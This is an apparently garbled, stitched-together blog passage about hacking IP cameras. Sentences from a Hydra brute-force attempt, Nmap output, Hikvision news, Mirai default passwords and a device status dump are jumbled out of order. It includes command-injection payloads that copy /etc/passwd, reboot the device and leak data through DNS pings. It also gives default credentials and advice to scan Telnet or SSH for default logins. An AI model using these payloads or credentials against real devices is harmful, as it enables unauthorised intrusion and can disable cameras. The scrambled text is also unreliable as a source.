Running Hydra with the rockyou password file but no luck yet :(ĭon't know if there is still code injection possibility through one off the. These cameras, by definition, are excluded, since they can no longer be reached.
#Ip cam hacking update
Nmap done: 1 IP address (1 host up) scanned in 7.10 seconds Many Hikvision IP cameras have been reported as being brought offline, either to update firmware and resolve the vulnerability or to remove remote connectivity to them when users realize the risks of placing vulnerable cameras on the internet. Var alias="" var deviceid="BRTD-012185-MCYML" var apilisense="GPYNQM" var sys_ver="V6.3.22.38(M)" var appver="V10.1.0.9" var now=1517568122 var alarm_status=0 var upnp_status=0 var dnsenable=0 var osdenable=0 var syswifi_mode=0 var mac="00:c0:29:01:0b:b1" var wifimac="00:c0:29:01:0b:b2" var sdstatus=0 var record_sd_status=0 var dns_status=0 var devicetype=0 var devicesubtype=0 var externwifi=1 var encrypt=0 var under=0 var sdtotal=0 var sdfree=0 var sdlevel=0 I still can request some of the cgi scripts like get_status and get_params.cgi: Look like the updated some firmwares and the root / 123456 isn't working anymore. If your IoT device has a Telnet port open (or SSH), scan for these username/password pairs. Update 20161006: The Mirai source code was leaked last week, and these are the worst passwords you can have in an IoT device. But this double-blind hack was a bit too much for this automated tool, unfortunately. Think commix like sqlmap, but for command injection. I also tried commix, as it looked promising on Youtube. There is no head, tr, less, more or cut on this device. $(cat/tmp/c) filter out unwanted charactersĪfter I finally hacked the camera, I saw the problem. $(cat /tmp/a|head -1>/tmp/b) filter for the first row $(cp /etc/passwd /tmp/a) copy /etc/passwd to a file which has a shorter name
And this is the time to thank EQ for his help during the hacking session night, and for his great ideas. The following are some examples of my desperate trying to get shell access. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. I was able to leak some information via DNS, like with the following commands I was able to see the current directory: $(ping%20-c%202%20%60pwd%60)īut whenever I tried to leak information from /etc/passwd, I failed.
0 kommentar(er)
